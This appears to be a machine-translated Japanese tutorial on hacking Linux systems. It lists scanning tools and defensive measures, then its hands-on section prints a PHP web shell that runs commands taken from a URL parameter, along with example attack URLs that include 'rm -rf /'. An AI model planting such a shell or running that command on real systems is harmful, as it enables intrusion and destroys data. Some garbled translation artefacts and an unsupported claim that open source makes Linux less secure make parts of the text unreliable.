Linux OS のハッキング: Ubuntu を使用したハッキン​​グ (コマンド チュートリアル)

Linux は、特に Web サーバーで最も広く使用されているサーバー オペレーティング システムです。 これはオープンソースです。 これは、誰でもソース コードにアクセスできることを意味します。 これにより、攻撃者がソースコードを調べて脆弱性を見つけることができるため、他のオペレーティングシステムと比較して安全性が低くなります。. Linux for Hackers は、これらの脆弱性を悪用してシステムに不正にアクセスすることを目的としています。

この記事では、Linuxとは何か、セキュリティの脆弱性、Ubuntuでのハッキングとその対策を紹介します。

Linux に関するクイック ノート

Linuxはオープンソースのオペレーティングシステムです。 Redhat、Fedora、Ubuntu など、Linux ベースのオペレーティング システムのディストリビューションは数多くあります。他のオペレーティング システムとは異なり、Linux はセキュリティの点で安全性が低くなります。 これは、ソース コードが自由に入手できるため、オープン ソースではない他のオペレーティング システムと比べて、脆弱性を調査し、悪用することが容易であるためです。 Linux は、サーバー、デスクトップ、タブレット、またはモバイル デバイスのオペレーティング システムとして使用できます。

Linux プログラムは、GUI またはコマンドを使用して操作できます。 Linux コマンド Kali Linux ハッキングは GUI を使用する場合に比べてより効果的かつ効率的です。このため、ハッキングには基本的な Linux コマンドを知っておくと役立ちます。

これらのチュートリアルを参照してください https://www.guru99.com/unix-linux-tutorial.html を始める方法について Kali Linux ハッキング。

Linux ハッキング ツール

  • ネサス– このツールは、Ubuntu ハック、スキャン構成設定、パッチ、ネットワークなどに使用できます。このツールは次の場所にあります。 https://www.tenable.com/products/nessus
  • Nマップ。 このツールを使用すると、サーバー上で実行されているホストと、ホストが利用しているサービスを監視できます。 ポートのスキャンにも使用できます。 それは次の場所で見つけることができます https://nmap.org/
  • サラ - SARA は、Security Auditor's Research Assistant の頭字語です。 名前が示すように、このツールは次のような脅威に対してネットワークを監査するために使用できます。 SQLインジェクション、XSS などで見つけることができます。 http://www-arc.com/sara/sara.html

上記のリストはすべてを網羅したものではありません。 これにより、Ubuntu のハッキングと Linux システムのハッキングに利用できるツールのアイデアが得られます。

Linux ハッキングを防ぐ方法

Linux ハッキングは、オペレーティング システムの脆弱性を利用します。 組織は次のことを採用できますwing このような攻撃から身を守るためのポリシー。

  • パッチ管理– パッチは、攻撃者がシステムを侵害するために悪用するバグを修正します。 適切なパッチ管理ポリシーを使用すると、システムに関連するパッチを常に適用できるようになります。
  • 適切な OS 構成– 他のエクスプロイトはサーバー構成の弱点を利用します。 非アクティブなユーザー名とデーモンは無効にする必要があります。 アプリケーションの共通パスワード、デフォルトのユーザー名、一部のポート番号などのデフォルト設定を変更する必要があります。
  • 侵入検知システム– このようなツールは、システムへの不正アクセスを検出するために使用できます。 一部のツールには、このような攻撃を検出して防止する機能があります。

ハッキング活動:PHPを使用してUbuntuLinuxシステムをハッキングする

この実践的なシナリオでは、Ubuntu を使用してハッキングする方法を学び、その使用方法に関する基本的な情報を提供します。 PHP Linux を侵害するためです。 私たちは被害者をターゲットにするつもりはありません。 試してみたい場合は、ローカル マシンに LAMPP をインストールできます。

PHP には、Linux ハッキング コマンドの実行に使用できる XNUMX つの関数が付属しています。 exec() 関数とshell_exec() 関数があります。 関数 exec() はコマンド出力の最後の行を返しますが、shell_exec() はコマンドの結果全体を文字列として返します。

デモンストレーションの目的で、攻撃者の管理者が次のファイルをアップロードすると仮定します。wing Webサーバー上のファイル。

<?php

$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';

echo "executing shell command:-> $cmd</br>";

$output = shell_exec($cmd);

echo "<pre>$output</pre>";

?>

ここに、

上記のスクリプトは、cmd という名前の GET 変数からコマンドを取得します。 コマンドはshell_exec()を使用して実行され、結果がブラウザに返されます。

上記のコードは、次のコードを使用して悪用できます。wing URL

http://localhost/cp/konsole.php?cmd=ls%20-l

ここに、

  • 「…konsole.php?cmd=ls%20-l」値 ls –l を変数 cmd に代入します.

サーバーをハッキングするための Ubuntu のコマンドは次のように実行されます。

shell_exec('ls -l') ;

上記のコードを Web サーバーで実行すると、次のような結果が得られます。wing.

PHP を使用して Ubuntu Linux システムをハッキングする

上記のコマンドは、現在のディレクトリ内のファイルとアクセス許可を表示するだけです。

攻撃者が次のコマンドを渡したとします。wing command

rm -rf /

ここに、

  • 「rm」はファイルを削除します
  • 「rf」は、rm コマンドを再帰モードで実行します。 すべてのフォルダーとファイルを削除する
  • 「/」は、ルート ディレクトリからファイルの削除を開始するコマンドを指示します。

攻撃 URL は次のようになります。

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

まとめ

  • Linux は、サーバー、デスクトップ、タブレット、モバイル デバイスで人気のあるオペレーティング システムです。
  • Linux はオープンソースであり、ソースコードは誰でも入手できます。 これにより、脆弱性を簡単に発見できます。 これはハッカーにとって最高の OS の XNUMX つです。
  • Ubuntu の基本およびネットワーク ハッキング コマンドは、Linux ハッカーにとって貴重です。
  • 脆弱性とは、システムを侵害するために悪用される可能性のある弱点です。
  • 優れたセキュリティは、攻撃者による侵害からシステムを保護するのに役立ちます。
Guru99 は Invicti のスポンサーです
インビクティ

Proof Based Scanning テクノロジーの開発者である Invicti は、Web アプリケーションのセキュリティ意識を高め、より多くの開発者が安全なコードの書き方を学べるようにするために、Guru99 プロジェクトを後援しました。